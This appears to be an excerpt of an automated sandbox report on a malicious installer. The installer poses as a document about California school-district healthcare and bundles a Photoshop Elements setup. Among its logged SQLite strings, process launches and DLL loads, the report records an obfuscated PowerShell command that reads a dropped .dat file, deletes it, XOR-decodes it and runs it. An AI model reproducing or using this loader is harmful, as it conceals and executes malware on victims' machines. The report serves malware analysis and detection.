Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, signature TEXT NOT NULL, PRIMARY KEY (payloadID) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE DependencyData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PayloadIDb TEXT ,type TEXT NOT NULL ,product_family TEXT, product_name TEXT, version TEXT, PRIMARY KEY (PayloadID,PayloadIDb,type,product_family,product_name,version));
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE ribs_payload_constraint ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE CASCADE, payloadIDb TEXT NOT NULL, constraintType INTEGER NOT NULL, PRIMARY KEY (payloadID, payloadIDb, constraintType) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE payload_data ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (payloadID, domain, key) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL , payloadIDUpgraded TEXT NOT NULL REFERENCES payloads (PayloadID), PRIMARY KEY (payloadIDOriginal, payloadIDUpgraded) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE SuitePayloads( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PRIMARY KEY (ProductID, PayloadID) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS pcd_meta ( key TEXT NOT NULL, value TEXT NOT NULL, PRIMARY KEY (key) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: INSERT OR REPLACE INTO pcd_meta (key, value) VALUES ('schema_compatibility_version', 1);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL REFERENCES ribs_payload (payloadID), payloadIDUpgraded TEXT NOT NULL REFERENCES ribs_payload (payloadID), PRIMARY KEY (payloadIDOriginal) );
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE ribs_collection ( collectionID TEXT NOT NULL, collectionPayloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, tsInstalled INT, tsModified INT, PRIMARY KEY (collectionID) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_version', 1);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS EULA_Ref( productID TEXT NOT NULL, langCode TEXT NOT NULL, eula_hash TEXT NOT NULL, PRIMARY KEY (productID, langCode) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE EULA_Files( productID TEXT NOT NULL, langCode TEXT NOT NULL,eula TEXT NOT NULL,PRIMARY KEY (productID, langCode) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE dependency_type( type INTEGER NOT NULL, description TEXT NOT NULL, PRIMARY KEY (type) );
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE ribs_collection_payload ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID) ON DELETE CASCADE, payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, installState INT NOT NULL DEFAULT 0, tsInstalled INTEGER, PRIMARY KEY (collectionID, payloadID) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE Branding ( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),resource_type TEXT NOT NULL,resource_data TEXT NOT NULL,PRIMARY KEY (ProductID, resource_type) );
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: UPDATE pcd_meta SET value = 2 WHERE key = 'schema_version';
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE dependencies( PayloadID TEXT NOT NULL REFERENCES payloads(PayloadID) ON DELETE CASCADE, PayloadIDb TEXT NOT NULL, type INTEGER NOT NULL REFERENCES dependency_types(type), PRIMARY KEY (PayloadID, PayloadIDb) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE payload_data ( PayloadID TEXT NOT NULL REFERENCES payloads (PayloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (PayloadID, domain, key) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE Suites( ProductID TEXT NOT NULL, group_name TEXT NOT NULL, group_family TEXT NOT NULL, display_name TEXT NOT NULL, PRIMARY KEY (ProductID) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE collection_data ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (collectionID, domain, key) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE user_actions ( product_id TEXT NOT NULL, actor TEXT , time_action TEXT NOT NULL);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: INSERT OR REPLACE INTO pcd_meta (key, value) VALUES ('schema_version', 2);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: INSERT OR REPLACE INTO pcd_meta (key, value) VALUES ('schema_version', 3);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE PayloadData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),domain TEXT NOT NULL,key TEXT NOT NULL,value TEXT NOT NULL,PRIMARY KEY (PayloadID, domain, key) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS EULA_Version(eula_hash TEXT NOT NULL, Version TEXT NOT NULL, Reserved TEXT, PRIMARY KEY (eula_hash));
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: UPDATE upgraded_payloads SET payloadIDUpgraded = (SELECT second_upgraded.payloadIDUpgraded FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal WHERE upgraded_payloads.payloadIDOriginal = first_upgraded.payloadIDOriginal) WHERE payloadIDOriginal IN (SELECT first_upgraded.payloadIDOriginal FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE Payloads( PayloadID TEXT NOT NULL, payload_family TEXT NOT NULL,payload_name TEXT NOT NULL, payload_version TEXT NOT NULL,payload_type TEXT NOT NULL,PRIMARY KEY (PayloadID) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE domain_data ( domain TEXT NOT NULL, subDomain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (domain, subDomain, key) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS EULA_Content(eula_hash TEXT NOT NULL, Content TEXT NOT NULL, PRIMARY KEY (eula_hash));
Source: PhotoshopElements_2024_LS30_win64.exeString found in binary or memory: <CarouselType>GenericCarousel</CarouselType> <SkipAccLaunch>true</SkipAccLaunch> <LaunchProductDetail> <ProductInfo> <SAPCode>HPSE</SAPCode> <BaseVersion>24.0</BaseVersion> <Platform>win64</Platform> </ProductInfo> </LaunchP
Source: PhotoshopElements_2024_LS30_win64.exeString found in binary or memory: <CarouselType>GenericCarousel</CarouselType> <SkipAccLaunch>true</SkipAccLaunch> <LaunchProductDetail> <ProductInfo> <SAPCode>HPSE</SAPCode> <BaseVersion>24.0</BaseVersion> <Platform>win64</Platform> </ProductInfo> </LaunchP
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeFile read: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe "C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe"
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeProcess created: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe"
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" --pipename={6701CC87-BE79-4714-84C1-CDD879D9C7E0} --edtWorkFlow=1
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&locale=en_US&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4124 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeProcess created: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp "C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe "C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" --pipename={6701CC87-BE79-4714-84C1-CDD879D9C7E0} --edtWorkFlow=1
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&locale=en_US&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4124 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: iertutil.dllJump to behavior
